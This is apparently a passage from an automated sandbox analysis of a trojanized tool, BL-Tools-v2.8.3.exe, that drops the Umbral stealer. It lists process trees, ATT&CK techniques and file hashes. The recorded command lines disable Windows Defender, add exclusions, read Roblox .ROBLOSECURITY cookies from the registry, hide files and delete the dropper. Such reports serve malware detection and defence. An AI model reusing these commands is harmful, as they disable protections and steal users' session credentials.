    - Suspicious behavior: EnumeratesProcesses
    PID:6048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5432
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:4244
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:5720
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5696
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5848
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    PID:1520
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:4068

C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5380
- C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
  "C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5404
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:5068
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:440
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:5224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5944
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:5940
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:5344
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:5928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:920
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:6036
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    PID:5192
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2696

C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5600
- C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
  "C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2012
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:5948
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3132
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:6072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:2772
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:5492
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:5780
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:5036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:5296
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4392
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    PID:808
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
3effaeddac0db743c253b2e0fe1e6354

SHA1
61a61530bae8e61d4fd62d23dcacce3991a938d3

SHA256
374c50f938fca00bd7cddadc034f0a2f8ae04317451788d86e9bdf7ae47c91a2

SHA512
8419ea105606073d4c6e236fccc8d70af845c6bab22fe03075796e71bd4c48917e495243fa23d6997aa54ffde57572f679de7c163570030d217a6fd16c78f82e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
e3efbf966eaf5ad64f971685881fbd50

SHA1
de5eabc123315908aa1ed14a5903bc8647ab8dcf

SHA256
745c921b33253f7b22cd71df2976f4765042102c075ffbed3c7188c36d3fad5c

SHA512
c21a028cb9ebc9e04e855687aa477218b5e97acc0e3d11d5e264e4966ec5568a5f1b55cea6f9393dc57c01b906a65394b36d971a99398c000659d1a2a8cc7184

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
7d0ac8a03df5612a859e162b076c3270

SHA1
a848378738b2c3ac89f4936f3db74a6e552b221f

SHA256
c725f430b0c1f51da4b47caacf4f8efe0e88d674cf96c9ee1309a0ca6d8d0b10

SHA512
6ef172c01e83dfe5c0811a6e9bce93cb7e9be71615f568e11848b2415763f61353fbd049d49e5acfaabdfccea989e6a3a7e0986e0eaaacfbde1c6067c146b6b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
15KB

MD5
ebd435df0787db59c0f0e52e2e581b9c

SHA1
6965b7f90e4dd0b885d64048f090fe49e8697d97

SHA256
1b35918f435bbbe15cac21a04c634a5feb92980d411f525e051202fdb48250d2

SHA512
f13c1a1385d625ef01f61e2700d2525311f98598a4a048208314dab0081a72963a6ffa5fb84967d2df3e1dac58c8ec6e3e40fb3dd2febe41b045986742392b07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
138KB

MD5
66552aefda2692dbde2c5434e9d96036

SHA1
10663315313bacc6978e6440965172c23123f1a6

SHA256
e3018556011a0e5be29c4fbd624ff9f78d828afab9e625014cf162561d500efa

SHA512
c348243bf1a6cacc68e56990842e02e521982f8d94d1092ba5bbb6be6d7a65e3d4976d454e537566487cf7f4c499251b776eb4384213f9c1867c737a0f3a12ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BL-Tools-v2.8.3.exe.log

Filesize
1KB

MD5
bb6a89a9355baba2918bb7c32eca1c94

SHA1
976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2

SHA256
192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b

SHA512
efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
547df619456b0e94d1b7663cf2f93ccb

SHA1
8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

SHA256
8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

SHA512
01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLTools 2.8.4 FIX.exe.log

Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
482fbb6ef0984159551ed81307d94b26

SHA1
6a9f978244f9217b29df57012c67d7795d86caee

SHA256
1aefb52c8ad4f5d652ce79efcbbcdbbc9718e80454b588155f7fd4957b45b5d6

SHA512
5bfe1471fdd77dfd053d9f72898822f07b13ebc6a411b62e3784b1f08b9f452cd39efdf7a34c0f8949b8860736a49a23d0b0a84a2411c8316bc7f92749cb1a3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
277f918918ca1de032c2948911ecb93c

SHA1
0307e48f22426ecfccad2f8eb0e69937ab957620

SHA256
f1a2de3d06fea09450f785b6746c54aaa5576fd844a42f95bd6776cf6105109f

SHA512
043d2ec78967055dd38d423277964681d9e0720eeb9cbf258c7ec753146d261a613a1e3b7adb9ab277f4657a21230e1c00d8fa96fcdf337c4a63cc1226fd52fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
520ff216c3f7d7c3d67393bea543fe23

SHA1
588939b12f373f3dcef0b9e5bbf4e8f578ef06ba

SHA256
88fce6a6dfcc22c2ea8eca77e2b43a15bc072bd79b7850c974a9930ca7ea74bf

SHA512
3374573132e1ac3bbcc99b9f2738296103cf8c39256018d18abccbe72921472825a2db4b660bf76d340242919e8cf433cb98d8031111a565c3a55db4143d6162

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4d5f16dff1c6c4bd78c48253f411da2

SHA1
0fb7366585572b2cf4144d169302ba21d8e71ac3

SHA256
360fe2bf9d46f0e6bb35c1b41ba0d70c5f10a1a9b42e29d9cafea37de5964133

SHA512
27cb84814bf84d0db623e68c06b6391e63d985d5fe77a9d6ca9093329fbe73da490bb9bef67fea667d2d03b1d42ed5b4591f9e72c281c15965d0765c019d4b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b79eba6da7413efa3073c1847c013c43

SHA1
8064312a89143475e20a7ef921b586bcfcce052b

SHA256
22afc01e3ae9c96fc2e2b1aa37c821dd94dcf5db576f327eae9c09cb815a97bd

SHA512
f5d1a509e3e21a537a25f948afe34c1ac7a554fa325ee9cbc53df0ba3122f1ec4b32841efeaeba2500595525e22b79c9cfadacf1e11335e7a4444ad3138ca057

Download Submit
C:\Users\Admin\AppData\Local\Temp\AlphaFS.dll

Filesize
359KB

MD5
f2f6f6798d306d6d7df4267434b5c5f9

SHA1
23be62c4f33fc89563defa20e43453b7cdfc9d28

SHA256
837f2ceab6bbd9bc4bf076f1cb90b3158191888c3055dd2b78a1e23f1c3aafdd

SHA512
1f0c52e1d6e27382599c91ebd5e58df387c6f759d755533e36688b402417101c0eb1d6812e523d23048e0d03548fd0985a3fd7f96c66625c6299b1537c872211

Download Submit
C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe

Filesize
3.1MB

MD5
fe611814d50bd962d1d85e3fb7425ff8

SHA1
25ca8e5f48d694d4f715bf5a299062f4a979aefd

SHA256
747072a4094dd0004d84abd221863ca2db676853c5ca27dd9b962650790a6472

SHA512
a7a8dad9e6fdfd515203d6165fd9a89902c9d82adaa4bd24992a6e991501317bafaa3066ebbae17ecf0223e7a25aacc098c3449fa7533529c2eba79acf85ef14

Download Submit
C:\Users\Admin\AppData\Local\Temp\Extreme.Net.dll

Filesize
121KB

MD5
f79f0e3a0361cac000e2d3553753cd68

SHA1
4314bcef76fddc9379a8f3a266b37d685d0adb79

SHA256
8a6518ab7419fbec3ac9875baa3afb410ad1398c7aa622a09cd9084ec6cadfcd

SHA512
c77516e7f5540ecd13fa5d8cecfce34629acecd9b5a445f5f48902c9e823328fa9a6694ecaa39f5b6053de61c2b850c2d87df25357548afaad6ec37eb3e5e355

Download Submit
C:\Users\Admin\AppData\Local\Temp\FRkbJyXksJ9GwKI

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ftf0RKkDHGIgS0u\Browsers\Cookies\Chrome Cookies.txt

Filesize
224B

MD5
136353761ca7b04911e1f2ad7c51cd10

SHA1
c1fe5cf268ec63e0403b3b415010e0851a613f69

SHA256
432f101811307813a4ab26fba1a6f763f9fdc3a54cc915adb0efc01707323834

SHA512
ffa7ebef13bd3bcae25d283c8995013b01d18eed16cff95ced5da5a375adce97cfe7c360fe620587483881c71c25f1a0ac1505ff3917201860c64681661b1b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\License.dll

Filesize
5B

MD5
b08a5c34cf0a06615da2ca89010d8b4f

SHA1
626a77d86d9d12d1772f788cf67c8e77fd9f797a

SHA256
04cc5b3b49a7e9e9b6c66c7be59a20992bf2653746b5d43829c383fb233f88fa

SHA512
5dce742cd0f649461b08f8f8018e0fa39ef19e813a74a91f434a15754a4fa8be83096e8fa49cf1828ac011220b7ad3724e7e4ea9cce7937a3168169d8e561b2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MaterialDesignColors.dll

Filesize
295KB

MD5
5c108c4da6d03f0fa2c3b4dc7890cb52

SHA1
48af67b6166068b6f138306bbd1157c7583c6e73

SHA256
b5ec30c93b1d2b4631ee2b178750ec92e302e2e331090ec9783981b9572354f8

SHA512
48d055610eead361809bd839c66ccdca1d5e0d9dffe15af9d15afa106ee7791c8b17acb91f2aba5cf3dda2997b049bcf70b43c3b56b8b01f1fc7bb845ce6c91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\MaterialDesignThemes.Wpf.dll

Filesize
9.1MB

MD5
824cbf63999f954aa1747f79586a4d3c

SHA1
5f1cd6346a45024bbbe09e304c12b6f6bf227d5c

SHA256
344e2cee979e979932f504dc76bd75e97ae1ff46caa3fe2795adfe0a866347f7

SHA512
d36149f7cb5ffc62dac6bb4521105d09fac988de567e181fdca4f23e5079aca5f4292e1d314f797f1a597263ddac0210060cb71c111565717e3a288a47770c51

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft.Xaml.Behaviors.dll

Filesize
142KB

MD5
95f46f34c099421d917d5feadbb33edb

SHA1
3d1cb9cf59000012734901a35baeb3d9c1dd5db3

SHA256
8e77a1dd5e2df4d4af801376cc3428b082eb49fcb6e647b933967fae12ad9d5d

SHA512
c9c9f72980316c68ad2a8dbe2c6c563c0deddfc9e845674d0e2f5313a0ae285d60a755e2ca04164f78b37a36521259307b3eb7d43f5ec9a9de5507bda7e4c1b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
695KB

MD5
195ffb7167db3219b217c4fd439eedd6

SHA1
1e76e6099570ede620b76ed47cf8d03a936d49f8

SHA256
e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

SHA512
56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ookii.Dialogs.Wpf.dll

Filesize
103KB

MD5
932ebb3f9e7113071c6a17818342b7cc

SHA1
9ce2d08bc3840632092325abcc8d842eeb8189d4

SHA256
285aa8225732ddbcf211b1158bd6cff8bf3acbeeab69617f4be85862b7105ab5

SHA512
6b6086cff7b916c0c4536e3c7cba4ba17d6c4be2e4a88a5877be852e197f1f9c9c120d1295acf2b4277a9badd8cfd229ef3c1ab2049d0aeec22d3033be156141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Settings.ini

Filesize
3KB

MD5
7900c2057dbe2c03bacc5f63abf6b635

SHA1
0ae7a6747d43a1ab20b8c7aae993e2665924fc3b

SHA256
0c533b51a9cd2fa6069d31dc06caec549742690a2ae7dda5b8a1bf2d8b86741a

SHA512
2b8bf06352a0c4f16d42bdb18519adfe7211e4450f3030eeb7c4f4fd5e5ad1fb09ca3e756bc5333513f58aecaaf263d6900e7b60a140004bdf635a7244670b8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
4a2673a8ceb3c0afb830cb145d1bb9fe

SHA1
8b12f4955e53b2fdb150cf29aa9fc01e8937c14e

SHA256
4cb6bb75074c44c2a773918ae253e711c364d17519f903e3bcb6c4c50747f279

SHA512
4b41674a2a691b0b5cf80e3768ca8add7971fc94b812c06c102be3075bfcb859a62fb11bd87880d05239f03e09bb3d627e26d4eebc9f97a83139b62b04304f77

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xl1lb4on.zto.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b8v1WximrDwkweV

Filesize
20KB

MD5
527b61512f02e692cc5b21268ce3b20f

SHA1
eeff70fe7d86f48583147d7c46d2ad217c5b2473

SHA256
cdee2ddbf1b045a042b1b9d61d3fdf859dc3289b5c6dc09d5fd0b1799da4f628

SHA512
131f517d54bbe9d2c04bab4fff089b887b827797b625c380cfc30193c77f3ecad85abd1b9c773d700df45f0649e0fa548c00fb25eed0532f9d858b473651c43e

Download Submit
C:\Users\Admin\AppData\Local\Temp\xp7Qkwsnq6jFwyh

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\xp7Qkwsnq6jFwyh

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe

Filesize
6.4MB

MD5
3488ad52666afe9800364a9c34f9725d

SHA1
3412ee1bb608e54b5c80c210432ca23c0c3dd766

SHA256
aa23463d85a070a894711f628356694599b8eeca33e3e3dc161f2ef765932235

SHA512
e5f42f9f71557720cb7072a37107be5224020dfa94a49a42a56107b0bd8be84aef28f9191705966861fdd6b7a50ff379c3fc36bd2f56e194142711fe9790d06a

Download Submit
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe

Filesize
3.3MB

MD5
30c33f45545b68bd1e0d7ec79a090883

SHA1
086e1fadee4a61091250dedb616785c73b50950c

SHA256
4e95226cce6e17fdc39f3a5f9050720d7848bb34ce2df72e63c878235c5be630

SHA512
d76e6d64147d185a07b819cc9fe26daa1c1ae72af6a01b5467ae0b7f07239a8c0edc0c9066fff22c08241025909b492af9cc1f4e3d0eb136a54ee3b7a0d5a6f4

Download Submit
C:\Users\Admin\Downloads\tmf8tc.rar

Filesize
12.2MB

MD5
f37b812cc9484786b12117131e8438b9

SHA1
fe35f0dbd878e47408f59e0d143d6625b0621b65

SHA256
f32314edf401ff51c6298f0396d1f1e3dee5d72f524262c31815ba97df8c0e9e

SHA512
250cd925d429e92054386bfa76814f01ac15c7cb2d1253b5ccab21d2838c17876a7f4f46b139e43a313a7deed7ee055c8b6d844b1f18c3cc3000ed723c345052

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
